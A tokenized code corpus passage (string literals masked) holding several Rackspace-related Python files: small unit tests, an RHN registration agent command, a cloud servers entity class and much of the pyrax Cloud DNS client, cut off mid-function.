<s> import sys <EOL> import unittest2 as unittest <EOL> from raxcli . utils import get_enum_as_dict <EOL> class TestUtils ( unittest . TestCase ) : <EOL> def test_get_enum_as_dict ( self ) : <EOL> class EnumClass1 ( object ) : <EOL> KEY1 = <NUM_LIT:0> <EOL> KEY_TWO_TWO = <NUM_LIT:1> <EOL> SOME_KEY_SOME_SOME = <NUM_LIT:2> <EOL> result1 = get_enum_as_dict ( EnumClass1 , friendly_names = False ) <EOL> result2 = get_enum_as_dict ( EnumClass1 , friendly_names = True ) <EOL> result1_reversed = get_enum_as_dict ( EnumClass1 , reverse = True , <EOL> friendly_names = False ) <EOL> expected1 = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> expected2 = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> expected3 = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' <EOL> } <EOL> self . assertDictEqual ( result1 , expected1 ) <EOL> self . assertDictEqual ( result2 , expected2 ) <EOL> self . assertDictEqual ( result1_reversed , expected3 ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( unittest . main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import subprocess <EOL> import logging <EOL> import commands . network <EOL> RHN_PATH = '<STR_LIT>' <EOL> SYSTEMID_PATH = os . path . join ( RHN_PATH , '<STR_LIT>' ) <EOL> UP2DATE_PATH = os . path . join ( RHN_PATH , '<STR_LIT>' ) <EOL> def register_with_rhn ( activation_key , profile ) : <EOL> if os . path . exists ( SYSTEMID_PATH ) : <EOL> os . unlink ( SYSTEMID_PATH ) <EOL> logging . debug ( '<STR_LIT>' + '<STR_LIT>' % profile ) <EOL> pipe = subprocess . PIPE <EOL> p = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> activation_key , '<STR_LIT>' , profile , '<STR_LIT>' ] , <EOL> stdin = pipe , stdout = pipe , stderr = pipe , env = { } ) <EOL> logging . debug ( '<STR_LIT>' % p . pid ) <EOL> status = os . waitpid ( p . pid , <NUM_LIT:0> ) [ <NUM_LIT:1> ] <EOL> logging . debug ( '<STR_LIT>' % status ) <EOL> if status != <NUM_LIT:0> : <EOL> return ( <NUM_LIT> , "<STR_LIT>" % status ) <EOL> def configure_up2date ( domains ) : <EOL> if not isinstance ( domains , list ) : <EOL> domains = [ domains ] <EOL> domains = [ '<STR_LIT>' % d for d in domains ] <EOL> serverURL = '<STR_LIT:;>' . join ( [ '<STR_LIT>' % h for h in domains ] ) <EOL> noSSLServerURL = '<STR_LIT:;>' . join ( [ '<STR_LIT>' % h for h in domains ] ) <EOL> data = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' % { '<STR_LIT>' : serverURL , <EOL> '<STR_LIT>' : noSSLServerURL } <EOL> return { UP2DATE_PATH : data } <EOL> def kms_activate ( data ) : <EOL> activation_key = data [ '<STR_LIT>' ] <EOL> profile = data [ '<STR_LIT>' ] <EOL> domains = data [ '<STR_LIT>' ] <EOL> update_files = configure_up2date ( domains ) <EOL> commands . network . update_files ( update_files ) <EOL> ret = register_with_rhn ( activation_key , profile ) <EOL> if ret : <EOL> return ret <EOL> return ( <NUM_LIT:0> , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import hashlib <EOL> except ImportError : <EOL> import md5 <EOL> class hashlib ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def md5 ( ) : <EOL> return md5 . new ( ) <EOL> import os <EOL> import agent_test <EOL> import agentlib <EOL> import commands . update <EOL> class TestUpdateCommand ( agent_test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestUpdateCommand , self ) . setUp ( ) <EOL> self . update_inst = self . commands . command_instance ( "<STR_LIT>" ) <EOL> def test_1_valid_md5 ( self ) : <EOL> """<STR_LIT>""" <EOL> test_file = os . path . abspath ( __file__ ) <EOL> f = file ( test_file , '<STR_LIT:rb>' ) <EOL> m = hashlib . md5 ( ) <EOL> while True : <EOL> file_data = f . read ( <NUM_LIT> ) <EOL> if not file_data : <EOL> break <EOL> m . update ( file_data ) <EOL> f . close ( ) <EOL> md5sum = m . hexdigest ( ) <EOL> url = "<STR_LIT>" + test_file <EOL> local_file = self . update_inst . _get_to_local_file ( url , md5sum ) <EOL> f = file ( local_file ) <EOL> m = hashlib . md5 ( ) <EOL> while True : <EOL> file_data = f . read ( <NUM_LIT> ) <EOL> if not file_data : <EOL> break <EOL> m . update ( file_data ) <EOL> f . close ( ) <EOL> os . unlink ( local_file ) <EOL> self . assertEqual ( md5sum , m . hexdigest ( ) ) <EOL> def test_2_invalid_md5 ( self ) : <EOL> """<STR_LIT>""" <EOL> test_file = os . path . abspath ( __file__ ) <EOL> url = "<STR_LIT>" + test_file <EOL> self . assertRaises ( commands . update . AgentUpdateError , <EOL> self . update_inst . _get_to_local_file , url , '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> agent_test . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from com . rackspace . cloud . servers . api . client . entity import Entity <EOL> from com . rackspace . cloud . servers . api . client . jsonwrapper import json <EOL> """<STR_LIT>""" <EOL> class SharedIpGroup ( Entity ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = "<STR_LIT>" , server = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SharedIpGroup , self ) . __init__ ( name ) <EOL> self . _servers = server <EOL> self . _manager = None <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _name , self . _servers ) <EOL> def __eq__ ( self , other ) : <EOL> return ( self . _id , self . _name , self . _servers ) == ( other . _id , other . _name , other . _servers ) <EOL> def __ne__ ( self , other ) : <EOL> return ( self . _id , self . _name , self . _servers ) != ( other . _id , other . _name , other . _servers ) <EOL> def _get_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _name <EOL> def _set_name ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _name = value <EOL> name = property ( _get_name , _set_name ) <EOL> @ property <EOL> def servers ( self ) : <EOL> return self . _servers <EOL> @ property <EOL> def asDict ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self . _servers , "<STR_LIT>" ) : <EOL> serverKey = "<STR_LIT>" <EOL> else : <EOL> serverKey = "<STR_LIT>" <EOL> return { "<STR_LIT>" : { "<STR_LIT:id>" : self . _id , "<STR_LIT:name>" : self . _name , serverKey : self . _servers } } <EOL> @ property <EOL> def asJSON ( self ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( self . asDict ) <EOL> def initFromResultDict ( self , dic ) : <EOL> """<STR_LIT>""" <EOL> if dic is None : <EOL> return <EOL> sharedIpGroupCopy = copy . copy ( self ) <EOL> self . _id = dic . get ( "<STR_LIT:id>" ) <EOL> self . _name = dic . get ( "<STR_LIT:name>" ) <EOL> self . _servers = dic . get ( "<STR_LIT>" ) <EOL> self . _notifyIfChanged_ ( sharedIpGroupCopy ) </s>
<s> from functools import wraps <EOL> import json <EOL> import re <EOL> import time <EOL> import six <EOL> import pyrax <EOL> from pyrax . client import BaseClient <EOL> from pyrax . cloudloadbalancers import CloudLoadBalancer <EOL> import pyrax . exceptions as exc <EOL> from pyrax . manager import BaseManager <EOL> from pyrax . resource import BaseResource <EOL> import pyrax . utils as utils <EOL> DEFAULT_TIMEOUT = <NUM_LIT:5> <EOL> DEFAULT_DELAY = <NUM_LIT:0.5> <EOL> DEFAULT_RETRY = <NUM_LIT:3> <EOL> def assure_domain ( fnc ) : <EOL> @ wraps ( fnc ) <EOL> def _wrapped ( self , domain , * args , ** kwargs ) : <EOL> if not isinstance ( domain , CloudDNSDomain ) : <EOL> try : <EOL> domain = self . _manager . get ( domain ) <EOL> except exc . NotFound : <EOL> domain = self . _manager . find ( name = domain ) <EOL> return fnc ( self , domain , * args , ** kwargs ) <EOL> return _wrapped <EOL> class CloudDNSRecord ( BaseResource ) : <EOL> """<STR_LIT>""" <EOL> GET_DETAILS = False <EOL> type = None <EOL> name = None <EOL> data = None <EOL> priority = None <EOL> ttl = None <EOL> comment = None <EOL> def update ( self , data = None , priority = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_record ( self . domain_id , self , data = data , <EOL> priority = priority , ttl = ttl , comment = comment ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . get_record ( self . domain_id , self ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_record ( self . domain_id , self ) <EOL> class CloudDNSDomain ( BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def delete ( self , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> self . manager . delete ( self , delete_subdomains = delete_subdomains ) <EOL> def changes_since ( self , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . changes_since ( self , date_or_datetime ) <EOL> def export ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . export_domain ( self ) <EOL> def update ( self , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_domain ( self , emailAddress = emailAddress , <EOL> ttl = ttl , comment = comment ) <EOL> def list_subdomains ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . list_subdomains ( self , limit = limit , offset = offset ) <EOL> def list_records ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . list_records ( self , limit = limit , offset = offset ) <EOL> def search_records ( self , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . search_records ( self , record_type = record_type , <EOL> name = name , data = data ) <EOL> def find_record ( self , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> matches = self . manager . search_records ( self , record_type = record_type , <EOL> name = name , data = data ) <EOL> if not matches : <EOL> raise exc . DomainRecordNotFound <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> raise exc . DomainRecordNotUnique <EOL> return matches [ <NUM_LIT:0> ] <EOL> def add_records ( self , records ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . add_records ( self , records ) <EOL> add_record = add_records <EOL> def get_record ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . get_record ( self , record ) <EOL> def update_record ( self , record , data = None , priority = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_record ( self , record , data = data , <EOL> priority = priority , ttl = ttl , comment = comment ) <EOL> def update_records ( self , records ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_records ( self , records ) <EOL> def delete_record ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_record ( self , record ) <EOL> class CloudDNSPTRRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , device = None ) : <EOL> self . type = self . id = self . data = self . name = None <EOL> self . ttl = self . comment = None <EOL> if data : <EOL> for key , val in data . items ( ) : <EOL> setattr ( self , key , val ) <EOL> self . device = device <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return pyrax . cloud_dns . delete_ptr_records ( self . device , self . data ) <EOL> def __repr__ ( self ) : <EOL> reprkeys = ( "<STR_LIT:id>" , "<STR_LIT:data>" , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % ( key , getattr ( self , key ) ) for key in reprkeys ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , info ) <EOL> class CloudDNSManager ( BaseManager ) : <EOL> def __init__ ( self , api , resource_class = None , response_key = None , <EOL> plural_response_key = None , uri_base = None ) : <EOL> super ( CloudDNSManager , self ) . __init__ ( api , resource_class = resource_class , <EOL> response_key = response_key , plural_response_key = plural_response_key , <EOL> uri_base = uri_base ) <EOL> self . _paging = { "<STR_LIT>" : { } , "<STR_LIT>" : { } , "<STR_LIT>" : { } } <EOL> self . _reset_paging ( service = "<STR_LIT:all>" ) <EOL> self . _timeout = DEFAULT_TIMEOUT <EOL> self . _delay = DEFAULT_DELAY <EOL> def _create_body ( self , name , emailAddress , ttl = <NUM_LIT> , comment = None , <EOL> subdomains = None , records = None ) : <EOL> """<STR_LIT>""" <EOL> if subdomains is None : <EOL> subdomains = [ ] <EOL> if records is None : <EOL> records = [ ] <EOL> body = { "<STR_LIT>" : [ { <EOL> "<STR_LIT:name>" : name , <EOL> "<STR_LIT>" : emailAddress , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : comment , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : subdomains <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : records <EOL> } , <EOL> } ] } <EOL> return body <EOL> def _set_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . _timeout = timeout <EOL> def _set_delay ( self , delay ) : <EOL> """<STR_LIT>""" <EOL> self . _delay = delay <EOL> def _reset_paging ( self , service , body = None ) : <EOL> """<STR_LIT>""" <EOL> if service == "<STR_LIT:all>" : <EOL> for svc in self . _paging . keys ( ) : <EOL> svc_dct = self . _paging [ svc ] <EOL> svc_dct [ "<STR_LIT>" ] = svc_dct [ "<STR_LIT>" ] = None <EOL> svc_dct [ "<STR_LIT>" ] = None <EOL> return <EOL> svc_dct = self . _paging [ service ] <EOL> svc_dct [ "<STR_LIT>" ] = svc_dct [ "<STR_LIT>" ] = None <EOL> svc_dct [ "<STR_LIT>" ] = None <EOL> if not body : <EOL> return <EOL> svc_dct [ "<STR_LIT>" ] = body . get ( "<STR_LIT>" ) <EOL> links = body . get ( "<STR_LIT>" ) <EOL> uri_base = self . uri_base <EOL> if links : <EOL> for link in links : <EOL> href = link [ "<STR_LIT>" ] <EOL> pos = href . index ( uri_base ) <EOL> page_uri = href [ pos - <NUM_LIT:1> : ] <EOL> if link [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> svc_dct [ "<STR_LIT>" ] = page_uri <EOL> elif link [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> svc_dct [ "<STR_LIT>" ] = page_uri <EOL> def _get_pagination_qs ( self , limit , offset ) : <EOL> pagination_items = [ ] <EOL> if limit is not None : <EOL> pagination_items . append ( "<STR_LIT>" % limit ) <EOL> if offset is not None : <EOL> pagination_items . append ( "<STR_LIT>" % offset ) <EOL> qs = "<STR_LIT:&>" . join ( pagination_items ) <EOL> qs = "<STR_LIT>" % qs if qs else "<STR_LIT>" <EOL> return qs <EOL> def list ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( self . uri_base , self . _get_pagination_qs ( limit , offset ) ) <EOL> return self . _list ( uri ) <EOL> def _list ( self , uri , obj_class = None , list_all = False ) : <EOL> """<STR_LIT>""" <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> data = resp_body [ self . plural_response_key ] <EOL> ret = [ obj_class ( self , res , loaded = False ) <EOL> for res in data if res ] <EOL> self . _reset_paging ( "<STR_LIT>" , resp_body ) <EOL> if list_all : <EOL> dom_paging = self . _paging . get ( "<STR_LIT>" , { } ) <EOL> while dom_paging . get ( "<STR_LIT>" ) : <EOL> next_uri = dom_paging . get ( "<STR_LIT>" ) <EOL> ret . extend ( self . _list ( uri = next_uri , obj_class = obj_class , <EOL> list_all = False ) ) <EOL> return ret <EOL> def list_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list ( uri ) <EOL> def list_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list ( uri ) <EOL> def _get ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % uri <EOL> resp , body = self . _retry_get ( uri ) <EOL> body [ "<STR_LIT>" ] = [ ] <EOL> return self . resource_class ( self , body , loaded = True ) <EOL> def _retry_get ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> for i in six . moves . range ( DEFAULT_RETRY ) : <EOL> resp , body = self . api . method_get ( uri ) <EOL> if body : <EOL> return resp , body <EOL> raise exc . ServiceResponseFailure ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def _async_call ( self , uri , body = None , method = "<STR_LIT:GET>" , error_class = None , <EOL> has_response = True , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> api_methods = { <EOL> "<STR_LIT:GET>" : self . _retry_get , <EOL> "<STR_LIT:POST>" : self . api . method_post , <EOL> "<STR_LIT>" : self . api . method_put , <EOL> "<STR_LIT>" : self . api . method_delete , <EOL> } <EOL> api_method = api_methods [ method ] <EOL> try : <EOL> if body is None : <EOL> resp , resp_body = api_method ( uri , * args , ** kwargs ) <EOL> else : <EOL> resp , resp_body = api_method ( uri , body = body , * args , ** kwargs ) <EOL> except Exception as e : <EOL> if error_class : <EOL> raise error_class ( e ) <EOL> else : <EOL> raise <EOL> callbackURL = resp_body [ "<STR_LIT>" ] . split ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> massagedURL = "<STR_LIT>" % callbackURL <EOL> start = time . time ( ) <EOL> timed_out = False <EOL> while ( resp_body [ "<STR_LIT:status>" ] == "<STR_LIT>" ) and not timed_out : <EOL> resp_body = None <EOL> while resp_body is None and not timed_out : <EOL> resp , resp_body = self . _retry_get ( massagedURL ) <EOL> if self . _timeout : <EOL> timed_out = ( ( time . time ( ) - start ) > self . _timeout ) <EOL> time . sleep ( self . _delay ) <EOL> if timed_out : <EOL> raise exc . DNSCallTimedOut ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( uri , self . _timeout ) ) <EOL> if error_class and ( resp_body [ "<STR_LIT:status>" ] == "<STR_LIT>" ) : <EOL> self . _process_async_error ( resp_body , error_class ) <EOL> if has_response : <EOL> ret = resp , resp_body [ "<STR_LIT>" ] <EOL> else : <EOL> ret = resp , resp_body <EOL> try : <EOL> resp_body = json . loads ( resp_body ) <EOL> except Exception : <EOL> pass <EOL> return ret <EOL> def _process_async_error ( self , resp_body , error_class ) : <EOL> """<STR_LIT>""" <EOL> def _fmt_error ( err ) : <EOL> details = err . get ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT:U+0020>" ) <EOL> if not details : <EOL> details = err . get ( "<STR_LIT:message>" , "<STR_LIT>" ) <EOL> return "<STR_LIT>" % ( details , err . get ( "<STR_LIT:code>" , "<STR_LIT>" ) ) <EOL> error = resp_body . get ( "<STR_LIT:error>" , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in error : <EOL> faults = error . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , [ ] ) <EOL> msgs = [ _fmt_error ( fault ) for fault in faults ] <EOL> msg = "<STR_LIT:\n>" . join ( msgs ) <EOL> else : <EOL> msg = _fmt_error ( error ) <EOL> raise error_class ( msg ) <EOL> def _create ( self , uri , body , records = None , subdomains = None , <EOL> return_none = False , return_raw = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . run_hooks ( "<STR_LIT>" , body , ** kwargs ) <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT:POST>" , <EOL> error_class = exc . DomainCreationFailed ) <EOL> response_body = resp_body [ self . response_key ] [ <NUM_LIT:0> ] <EOL> return self . resource_class ( self , response_body ) <EOL> def delete ( self , domain , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( self . uri_base , utils . get_id ( domain ) ) <EOL> if delete_subdomains : <EOL> uri = "<STR_LIT>" % uri <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> error_class = exc . DomainDeletionFailed , has_response = False ) <EOL> def findall ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( kwargs ) == <NUM_LIT:1> ) and ( "<STR_LIT:name>" in kwargs ) : <EOL> nm = kwargs [ "<STR_LIT:name>" ] . lower ( ) <EOL> uri = "<STR_LIT>" % ( self . uri_base , nm ) <EOL> matches = self . _list ( uri , list_all = True ) <EOL> return [ match for match in matches <EOL> if match . name . lower ( ) == nm ] <EOL> else : <EOL> return super ( CloudDNSManager , self ) . findall ( ** kwargs ) <EOL> def changes_since ( self , domain , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> domain_id = utils . get_id ( domain ) <EOL> dt = utils . iso_time_string ( date_or_datetime , show_tzinfo = True ) <EOL> uri = "<STR_LIT>" % ( domain_id , dt ) <EOL> resp , body = self . _retry_get ( uri ) <EOL> return body . get ( "<STR_LIT>" , [ ] ) <EOL> def export_domain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:GET>" , <EOL> error_class = exc . NotFound ) <EOL> return resp_body . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def import_domain ( self , domain_data ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" <EOL> body = { "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : domain_data , <EOL> } ] } <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:POST>" , body = body , <EOL> error_class = exc . DomainCreationFailed ) <EOL> return resp_body <EOL> def update_domain ( self , domain , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> if not any ( ( emailAddress , ttl , comment ) ) : <EOL> raise exc . MissingDNSSettings ( <EOL> "<STR_LIT>" ) <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> body = { "<STR_LIT>" : comment , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : emailAddress , <EOL> } <EOL> none_keys = [ key for key , val in body . items ( ) <EOL> if val is None ] <EOL> for none_key in none_keys : <EOL> body . pop ( none_key ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , body = body , <EOL> error_class = exc . DomainUpdateFailed , has_response = False ) <EOL> return resp_body <EOL> def list_subdomains ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % domain . name <EOL> page_qs = self . _get_pagination_qs ( limit , offset ) <EOL> if page_qs : <EOL> uri = "<STR_LIT>" % ( uri , page_qs [ <NUM_LIT:1> : ] ) <EOL> return self . _list_subdomains ( uri , domain . id ) <EOL> def _list_subdomains ( self , uri , domain_id ) : <EOL> resp , body = self . _retry_get ( uri ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> subdomains = body . get ( "<STR_LIT>" , [ ] ) <EOL> return [ CloudDNSDomain ( self , subdomain , loaded = False ) <EOL> for subdomain in subdomains <EOL> if subdomain [ "<STR_LIT:id>" ] != domain_id ] <EOL> def list_subdomains_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_subdomains ( uri ) <EOL> def list_subdomains_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_subdomains ( uri ) <EOL> def list_records ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( utils . get_id ( domain ) , <EOL> self . _get_pagination_qs ( limit , offset ) ) <EOL> return self . _list_records ( uri ) <EOL> def _list_records ( self , uri ) : <EOL> resp , body = self . _retry_get ( uri ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> pat = "<STR_LIT>" <EOL> mtch = re . search ( pat , uri ) <EOL> dom_id = mtch . groups ( ) [ <NUM_LIT:0> ] <EOL> records = body . get ( "<STR_LIT>" , [ ] ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def list_records_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_records ( uri ) <EOL> def list_records_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" ) <EOL> return self . _list_records ( uri ) <EOL> def search_records ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> search_params = [ ] <EOL> if name : <EOL> search_params . append ( "<STR_LIT>" % name ) <EOL> if data : <EOL> search_params . append ( "<STR_LIT>" % data ) <EOL> query_string = "<STR_LIT:&>" . join ( search_params ) <EOL> dom_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % ( dom_id , record_type ) <EOL> if query_string : <EOL> uri = "<STR_LIT>" % ( uri , query_string ) <EOL> resp , body = self . _retry_get ( uri ) <EOL> records = body . get ( "<STR_LIT>" , [ ] ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> rec_paging = self . _paging . get ( "<STR_LIT>" , { } ) <EOL> while rec_paging . get ( "<STR_LIT>" ) : <EOL> resp , body = self . _retry_get ( rec_paging . get ( "<STR_LIT>" ) ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> records . extend ( body . get ( "<STR_LIT>" , [ ] ) ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def add_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( records , dict ) : <EOL> records = [ records ] <EOL> dom_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % dom_id <EOL> body = { "<STR_LIT>" : records } <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:POST>" , body = body , <EOL> error_class = exc . DomainRecordAdditionFailed , has_response = False ) <EOL> records = resp_body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , [ ] ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def get_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> rec_id = utils . get_id ( record ) <EOL> domain_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % ( domain_id , rec_id ) <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> resp_body [ "<STR_LIT>" ] = domain_id <EOL> return CloudDNSRecord ( self , resp_body , loaded = False ) <EOL> def update_record ( self , domain , record , data = None , priority = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> rdict = { "<STR_LIT:id>" : record . id , <EOL> "<STR_LIT:name>" : record . name , <EOL> } <EOL> pdict = { "<STR_LIT:data>" : data , <EOL> "<STR_LIT>" : priority , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : comment , <EOL> } <EOL> utils . params_to_dict ( pdict , rdict ) <EOL> return self . update_records ( domain , [ rdict ] ) <EOL> def update_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( records , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> body = { "<STR_LIT>" : records } , <EOL> error_class = exc . DomainRecordUpdateFailed , has_response = False ) <EOL> return resp_body <EOL> def delete_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( utils . get_id ( domain ) , <EOL> utils . get_id ( record ) ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> error_class = exc . DomainRecordDeletionFailed , has_response = False ) <EOL> return resp_body <EOL> def _get_ptr_details ( self , device , device_type ) : <EOL> """<STR_LIT>""" <EOL> context = self . api . identity <EOL> region = self . api . region_name <EOL> if device_type . lower ( ) . startswith ( "<STR_LIT>" ) : <EOL> ep = pyrax . _get_service_endpoint ( context , "<STR_LIT>" , region ) <EOL> svc = "<STR_LIT>" <EOL> svc_name = "<STR_LIT>" <EOL> else : <EOL> ep = pyrax . _get_service_endpoint ( context , "<STR_LIT>" , region ) <EOL> svc = "<STR_LIT>" <EOL> svc_name = "<STR_LIT>" <EOL> href = "<STR_LIT>" % ( ep , svc , utils . get_id ( device ) ) <EOL> return ( href , svc_name ) <EOL> def _resolve_device_type ( self , device ) : <EOL> """<STR_LIT>""" <EOL> try : 